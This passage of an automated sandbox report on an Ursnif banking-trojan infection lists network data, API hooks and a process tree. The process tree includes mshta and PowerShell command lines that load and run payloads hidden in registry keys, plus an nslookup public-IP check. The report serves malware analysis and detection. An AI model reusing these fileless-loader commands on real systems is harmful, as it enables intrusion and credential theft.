                                                        Data Raw: e9 b6 e3 58 66 dc 15 e4 80 de 6a 7c ed d6 c7 9c 13 7d 2c 30 77 87 0a 58 42 4f 0c 73 1f 5e 59 8b 56 46 5d 4a 82 ce db d3 96 28 96 67 b2 d9 1f 00 59 45 b0 8c b2 61 18 2b 75 9c 48 e8 bf 1e 63 6a 93 01 16 d9 d4 d8 0c 1b 0c 86 dc 63 18 46 b6 8f 9b 93 82 62 69 05 d5 22 40 61 ec 38 93 63 30 cf 27 cf b5 5a 73 96 99 fb 5a 58 26 be 6b cf 20 54 04 07 86 78 37 b8 dc d2 3e 0a 51 0a 93 2e 44 c6 45 b5 97 49 ae 63 08 c1 9a b7 91 3c 36 23 9e 3b 96 a6 8e 27 f3 ae 6d 81 74 d0 a5 ee 42 c9 6e 24 9c 79 77 39 30 c5 ec 88 f0 e0 9d 50 5a 4c 58 4b f3 76 c5 32 5d 99 91 e6 92 45 c8 f0 57 ba d4 51 09 eb 9c 83 ba 5a 63 eb f9 7b bd 94 1e 50 13 84 5b e2 3e 83 f5 22 fd f7 a5 d5 c0 c8 96 9b d1 89 d4 ff 01 22 42 23 46 76 98 d8 4e 56 a0 2f 0d 4a 4d 5d dc a7 4c 96 0f 80 0b 1e 9b 14 eb ce d5 55 5d 16 1b 47 1e 1f a9 b5 09 9e 3b 23 36 8d b3 e8 1d 28 5c f9 37 96 7c a1 c3 f5 07 66 93 ee f9 bb 51 93 46 d0 db b5 0b 9a c3 20 06 22 22 e4 f0 c2 9c 88 3e c3 31 5f 69 91 2c c2 59 c2 97 3a 61 33 85 fb b9 24 5f e1 e8 cf b8 e3 35 49 b3 47 1b b8 85 13 13 5d 52 2f e4 3d e9 1e f8 5d c0 92 68 34 a9 42 63 94 9f f4 75 15 d2 f9 0e f7 66 3a 25 73 77 bf 67 ff 68 e9 69 1a 8b 64 84 99 dc cb 68 2e d3 d5 fe 14 6c 30 11 29 61 8c 54 d8 17 6a cb 99 62 90 fc f1 30 cd 6d 51 80 9e 75 62 c1 1c 7c 57 58 13 3b 80 77 28 fd 65 bc 66 c2 a7 31 79 83 9a 47 db 81 bb 35 2f 99 6d ba 2d e0 66 0e 08 a2 70 b9 83 3b 89 0b d3 35 82 68 71 06 0b 96 ce 50 4d e4 4f 7c 23 88 92 17 23 c4 07 bb 49 7f 90 42 e4 bf ad cb cb f1 df e8 96 37 66 4f 9e b3 4a d6 5f 60 90 f2 c4 48 9a b3 c1 e1 eb 37 68 39 7a bc 39 fa 83 97 35 b0 cc 5c e1 53 7d a5 5d 6a 46 58 4e 9d bc fd 4f 3d 45 61 4d 82 5d b3 10 69 48 c1 b2 70 04 dc 93 d8 3c 56 a3 d5 ee 7e 44 ca 1e 61 34 d1 c7 f1 a0 92 15 f3 f3 36 c8 6c ea c3 8e 25 3f 86 c1 a0 75 9f cc 7c 43 24 32 f7 8d 06 b5 06 d1 10 f0 43 fa 6b f5 9c 55 fd dd 68 55 7d c7 be e4 c7 3f d6 77 a6 c1 45 1b ba 8b 0a 49 30 a4 cd 6b ad 96 e8 47 a7 f2 6a d2 3e 01 6f de d4 5a 0e 02 e8 d7 fd f8 a3 aa 82 be 26 06 29 29 09 d5 da 13 c1 75 c7 79 88 5d 50 40 66 65 8f b4 05 60 0f fb df 9a dc 52 f1 6a 63 6a bc b3 a6 8a 16 e7 3d a4 a8 34 13 44 aa 5a 2d e6 36 c9 2e bd 77 65 3b b9 50 e7 99 90 45 30 32 db 1d 21 50 ea a2 ee 3b 31 cc c4 af 6d 00 78 ac d7 f0 c2 69 59 02 f7 00 c9 6c 34 d8 4b b1 ae 6d 03 fd f7 1a 3e 5c 32 39 e7 6c 03 88 59 35 98 18 6c b7 40 cc da 2f 04 5f bf 74 8d c4 d0 d1 07 7c 15 cb aa a4 c7 a9 1c 38 25 69 b5 02 1a ab d3 d2 4f 0f 5c 4b b7 35 83 f2 62 3b f9 cd 8c ae a7 f0 9c 1c 31 eb ce 61 97 43 71 13 59 7d ae 6a e6 44 ae 7a 26 c7 83 78 11 a7 15 59 ec e2 f5 f1 32 46 57 ca ec 7d 98 3c 7a c4 6a 15 38 62 ec 4f d3 da 63 c5 8c 7c 6f 3b 34 3f ec 97 c7 99 0b f4 6f 3e 13 27 05 f1 80 9e d1 1b 64 98 22 e7 ea ed 98 35 98 c2 d5 07 34 43 40 b4 bb 67 43 35 a8 23 ca 1d ca 12 66 6a 7e 03 2d d4 61 26 b4 1d b6 cd f9 0b c6 7f
                                                        Data Ascii: Xfj|},0wXBOs^YVF]J(gYEa+uHcjcFbi"@a8c0'ZsZX&k Tx7>Q.DEIc<6#;'mtBn$yw90PZLXKv2]EWQZc{P[>""B#FvNV/JM]LU]G;#6(\7|fQF "">1_i,Y:a3$_5IG]R/=]h4Bcuf:%swghidh.l0)aTjb0mQub|WX;w(ef1yG5/m-fp;5hqPMO|##IB7fOJ_`H7h9z95\S}]jFXNO=EaM]iHp<V~Da46l%?u|C$2CkUhU}?wEI0kGj>oZ&))uy]P@fe`Rjcj=4DZ-6.we;PE02!P;1mxiYl4Km>\29lY5l@/_t|8%iO\K5b;1aCqY}jDz&xY2FW}<zj8bOc|o;4?o>'d"54C@gC5#fj~-a&
                                                        Sep 10, 2021 09:57:04.265170097 CEST6313INData Raw: 84 18 68 9e a5 53 64 63 58 36 8b 7d 64 e9 c3 31 4f 96 ee a1 e9 88 86 29 07 99 d1 6e c6 04 b3 b1 3f 02 5e 26 28 b0 bd 78 d4 6a 7f e9 d5 24 a7 d0 c0 cf e1 28 9b 14 b8 a2 d6 08 80 f8 e7 c8 2d cd 27 bc bd d8 80 a4 50 ed 16 5e 36 56 5c d5 00 7f d8 31
                                                        Data Ascii: hSdcX6}d1O)n?^&(xj$(-'P^6V\1zo,g}C 7BAX?@y)g9Gk-1*w"_I#@t"p=IPk FBzD5h;+R!B'\EfO475*)Jb2/iTrkrw!


                                                        Code Manipulations

                                                        User Modules

                                                        Hook Summary

                                                        Function NameHook TypeActive in Processes
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                        CreateProcessAsUserWEATexplorer.exe
                                                        CreateProcessAsUserWINLINEexplorer.exe
                                                        CreateProcessWEATexplorer.exe
                                                        CreateProcessWINLINEexplorer.exe
                                                        CreateProcessAEATexplorer.exe
                                                        CreateProcessAINLINEexplorer.exe

                                                        Processes

                                                        Process: explorer.exe, Module: WININET.dll
                                                        Function NameHook TypeNew Data
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA9B335200
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT66C777C
                                                        Process: explorer.exe, Module: user32.dll
                                                        Function NameHook TypeNew Data
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA9B335200
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT66C777C
                                                        Process: explorer.exe, Module: KERNEL32.DLL
                                                        Function NameHook TypeNew Data
                                                        CreateProcessAsUserWEAT7FFA9B33521C
                                                        CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        CreateProcessWEAT7FFA9B335200
                                                        CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        CreateProcessAEAT7FFA9B33520E
                                                        CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: wscript.exe PID: 3868 Parent PID: 3472

                                                        General

                                                        Start time:09:53:59
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'
                                                        Imagebase:0x7ff695db0000
                                                        File size:163840 bytes
                                                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: WmiPrvSE.exe PID: 5808 Parent PID: 792

                                                        General

                                                        Start time:09:56:21
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff6276c0000
                                                        File size:488448 bytes
                                                        MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6000 Parent PID: 5808

                                                        General

                                                        Start time:09:56:22
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                        Imagebase:0x7ff616d10000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6072 Parent PID: 6000

                                                        General

                                                        Start time:09:56:22
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                        Imagebase:0xf60000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: WmiPrvSE.exe PID: 6716 Parent PID: 792

                                                        General

                                                        Start time:09:56:59
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x910000
                                                        File size:426496 bytes
                                                        MD5 hash:7AB59579BA91115872D6E51C54B9133B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: WmiPrvSE.exe PID: 6844 Parent PID: 792

                                                        General

                                                        Start time:09:57:06
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff6276c0000
                                                        File size:488448 bytes
                                                        MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: mshta.exe PID: 6556 Parent PID: 3472

                                                        General

                                                        Start time:09:57:07
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                        Imagebase:0x7ff644970000
                                                        File size:14848 bytes
                                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: powershell.exe PID: 6948 Parent PID: 6556

                                                        General

                                                        Start time:09:57:09
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                        Imagebase:0x7ff617cb0000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 7044 Parent PID: 6948

                                                        General

                                                        Start time:09:57:09
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7ecfc0000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: csc.exe PID: 7060 Parent PID: 6948

                                                        General

                                                        Start time:09:57:17
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
                                                        Imagebase:0x7ff6c8550000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: cvtres.exe PID: 7072 Parent PID: 7060

                                                        General

                                                        Start time:09:57:18
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'
                                                        Imagebase:0x7ff69ad30000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: csc.exe PID: 7080 Parent PID: 6948

                                                        General

                                                        Start time:09:57:20
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
                                                        Imagebase:0x7ff6c8550000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        Chronological Activities

                                                        Analysis Process: cvtres.exe PID: 7100 Parent PID: 7080

                                                        General

                                                        Start time:09:57:21
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
                                                        Imagebase:0x7ff69ad30000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: explorer.exe PID: 3472 Parent PID: 6948

                                                        General

                                                        Start time:09:57:28
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff693d90000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: control.exe PID: 2896 Parent PID: 6072

                                                        General

                                                        Start time:09:57:28
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\control.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\control.exe -h
                                                        Imagebase:0x7ff64dbb0000
                                                        File size:117760 bytes
                                                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Author: Joe Security

                                                        Chronological Activities

                                                        Analysis Process: RuntimeBroker.exe PID: 4016 Parent PID: 3472

                                                        General

                                                        Start time:09:57:56
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6bbfa0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, Author: Joe Security

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 4612 Parent PID: 2896

                                                        General

                                                        Start time:09:57:57
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                        Imagebase:0x7ff616d10000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, Author: Joe Security

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 3208 Parent PID: 3472

                                                        General

                                                        Start time:09:58:01
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'
                                                        Imagebase:0x7ff7eef80000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 2424 Parent PID: 3208

                                                        General

                                                        Start time:09:58:05
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7ecfc0000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: nslookup.exe PID: 6256 Parent PID: 3208

                                                        General

                                                        Start time:09:58:05
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\nslookup.exe
                                                        Wow64 process (32bit):
                                                        Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                        Imagebase:
                                                        File size:86528 bytes
                                                        MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Analysis Process: rundll32.exe PID: 6072 Parent PID: 6000 rundll32.exeCOMMON

                                                          Executed Functions

                                                          Function 05586657, Relevance: 39.3, APIs: 26, Instructions: 336memorylibrarynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 5586657-55866a0 RtlInitializeCriticalSection call 5585ea9 3 55866c8-55866ca 0->3 4 55866a2-55866c6 memset RtlInitializeCriticalSection 0->4 5 55866cb-55866d1 3->5 4->5 6 5586ade-5586ae8 5->6 7 55866d7-55866fb CreateMutexA GetLastError 5->7 8 5586718-558671a 7->8 9 55866fd-5586702 7->9 12 5586ad9 8->12 13 5586720-558672b call 558aa55 8->13 10 5586704-5586711 CloseHandle 9->10 11 5586716 9->11 10->12 11->8 14 5586add 12->14 13->14 17 5586731-558673c call 559324e 13->17 14->6 17->14 20 5586742-5586754 GetUserNameA 17->20 21 5586778-5586788 20->21 22 5586756-558676e RtlAllocateHeap 20->22 24 558678a-558678f 21->24 25 5586791-55867ae NtQueryInformationProcess 21->25 22->21 23 5586770-5586776 GetUserNameA 22->23 23->21 24->25 26 55867d8-55867e2 24->26 27 55867b0 25->27 28 55867b4-55867c3 OpenProcess 25->28 31 558681f-5586823 26->31 32 55867e4-5586800 GetShellWindow GetWindowThreadProcessId 26->32 27->28 29 55867d1-55867d2 CloseHandle 28->29 30 55867c5-55867ca GetLastError 28->30 29->26 30->26 35 55867cc 30->35 33 5586838-558684f call 55889a2 31->33 34 5586825-5586835 memcpy 31->34 36 5586812-5586819 32->36 37 5586802-5586808 32->37 44 558685c-5586862 33->44 45 5586851-5586855 33->45 34->33 40 5586868-55868a9 call 557297d call 5581843 call 557529f call 558fa1f 35->40 36->31 38 558681b 36->38 37->36 41 558680a-5586810 37->41 38->31 55 55868ab-55868ba CreateEventA call 557231d 40->55 56 55868bf-55868ce call 558d2dd 40->56 41->31 44->14 44->40 45->44 47 5586857 call 557fa9c 45->47 47->44 55->56 56->14 60 55868d4-55868e7 RtlAllocateHeap 56->60 60->14 61 55868ed-558690d OpenEventA 60->61 62 558692d-5586955 call 5579c77 61->62 63 558690f-558691c CreateEventA 61->63 67 558695b-558696a 62->67 68 5586acc-5586ad3 62->68 63->62 64 558691e-5586928 GetLastError 63->64 64->14 69 5586a28-5586a2e 67->69 70 5586970-55869a2 call 5579c77 67->70 68->14 71 5586a3a-5586a41 69->71 72 5586a30-5586a35 call 558da6e call 5580c6e 69->72 85 55869b3-55869c7 LoadLibraryA 70->85 86 55869a4-55869af GetLastError 70->86 71->12 75 5586a47-5586a49 71->75 72->71 78 5586a4b-5586a51 75->78 79 5586aa2-5586aca call 5579c77 75->79 82 5586a60-5586a76 RtlAllocateHeap 78->82 83 5586a53-5586a5a SetEvent 